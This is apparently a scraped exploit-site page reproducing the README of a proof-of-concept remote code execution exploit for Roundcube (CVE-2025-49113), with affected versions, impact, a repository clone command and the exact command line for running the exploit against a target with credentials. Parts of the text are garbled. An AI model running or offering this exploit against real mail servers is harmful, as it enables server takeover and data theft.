## https://sploitus.com/exploit?id=3AFCA595-5CD1-5F55-8948-25280C9FB847
# Roundcube RCE Exploit (CVE-2025-49113)
A fully functional proof-of-concept exploit for **CVE-2025-49113**
---
## ๐ง Summary
**CVE-2025-49113** is an **The vulnerability is the result of a logic flaw in the application's session parser, which allows insecure deserialization of PHP objects. Authenticated users can exploit this issue to execute arbitrary commands on the server.**
---
## ๐ฅ Impact
An attacker with **valid credentials** (even low-privileged user accounts) can exploit this flaw to:
- Execute arbitrary system commands.
- Establish reverse shells or deploy persistence.
- Move laterally within the internal network if Roundcube is self-hosted.
---
## ๐งฉ Vulnerability Details
- **Type:** Insecure Deserialization โ Remote Code Execution
- **Component:** PHP backend (mail processing or plugin loading logic)
- **Conditions:** Authenticated session (cookie or login), crafted serialized payload
- **Exploit Primitive:** PHP `unserialize()` with attacker-controlled input and loaded gadgets
---
## โ Affected Versions
- **1.5.x:** All versions from `1.5.0` to `1.5.9`
- **1.6.x:** All versions from `1.6.0` to `1.6.10`
> Versions prior to 1.5.0 have not been tested, but are potentially vulnerable if backported plugins or features are present.
---
## โ๏ธ Exploit Requirements
- Python โฅ **3.7**
- PHP โฅ **7.4** (used for local payload crafting)
- Python libraries listed in `requirements.txt`
---
## ๐ป Setup & Installation
Clone the repository and install the required dependencies:
```bash
git clone https://github.com/BiiTts/Roundcube-CVE-2025-49113.git
cd roundcube-rce-CVE-2025-49113
pip install -r requirements.txt
```
## ๐ฅ Execute
```bash
python3 roundcube_exploit.py http://roundcube.local/ username password "cmd"
```
## ๐ป References
https://fearsoff.org/research/roundcube
https://nvd.nist.gov/vuln/detail/CVE-2025-49113
https://hakaisecurity.io/por-tras-da-falha-erro-de-logica-no-parser-de-sessao-do-roundcube-cve-2025-49113/research-blog/